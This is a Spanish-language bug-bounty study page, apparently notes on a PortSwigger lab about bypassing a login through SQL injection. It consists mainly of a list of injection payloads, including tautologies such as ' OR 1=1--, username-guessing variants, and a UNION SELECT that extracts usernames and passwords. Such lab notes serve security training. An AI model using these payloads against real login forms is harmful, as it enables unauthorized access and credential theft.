👾
Bug - Bunty
CtrlK
  • Bug bounty
  • Ejecución
    • Extras
  • Herramientas
    • sliver-server
      • .exe
    • Payloads
    • GPS LOCATION
    • Búsqueda de archivos
  • Cross-Site Scripting
    • XSS reflejado
    • XSS almacenado
    • XSS basado en DOM
    • Machines
      • Reflection
      • Login
      • DogShow
      • Escape
      • Frontend
      • TrrorLabs
      • Double
      • XSSaS
  • Open Redirect
    • Info
      • Redirection
      • Pingushop
      • Hidden Redirection
  • Cross-Site Request Forgery
    • Forgery
  • Inyecciones SQL
    • Inyecciones SQL
  • Mix Vulnerabilidades
    • OTP
  • PortSwigger
    • Inyección SQL
      • Vulnerabilidad de Inyección SQL en la Cláusula WHERE en Filtro de Categorías de Productos
      • Vulnerabilidad de inyección SQL que permite eludir el inicio de sesión
      • Ataque de inyección SQL, consultando el tipo y la versión de la base de datos en Oracle
      • Ataque de inyección SQL, consultando el tipo y versión de la base de datos en MySQL y Microsoft
Powered by GitBook
On this page
  1. PortSwigger
  2. Inyección SQL

Vulnerabilidad de inyección SQL que permite eludir el inicio de sesión


LUIS' #VERIFICAR VULN
' OR 1=1-- 
' OR 'admin' = username-- 
' OR 'a' = 'a'-- 
' OR 1=1 UNION SELECT null, username, password FROM users-- 
' OR 1=1;-- 

Verificamos si existe el usuario:

administrator' OR 1=1--
' OR 'admin' = username-- 
' OR 'administrator' = username-- 
' OR 'root' = username-- 
' OR 'admin' = username;-- 

PreviousVulnerabilidad de Inyección SQL en la Cláusula WHERE en Filtro de Categorías de ProductosNextAtaque de inyección SQL, consultando el tipo y la versión de la base de datos en Oracle

Last updated 1 day ago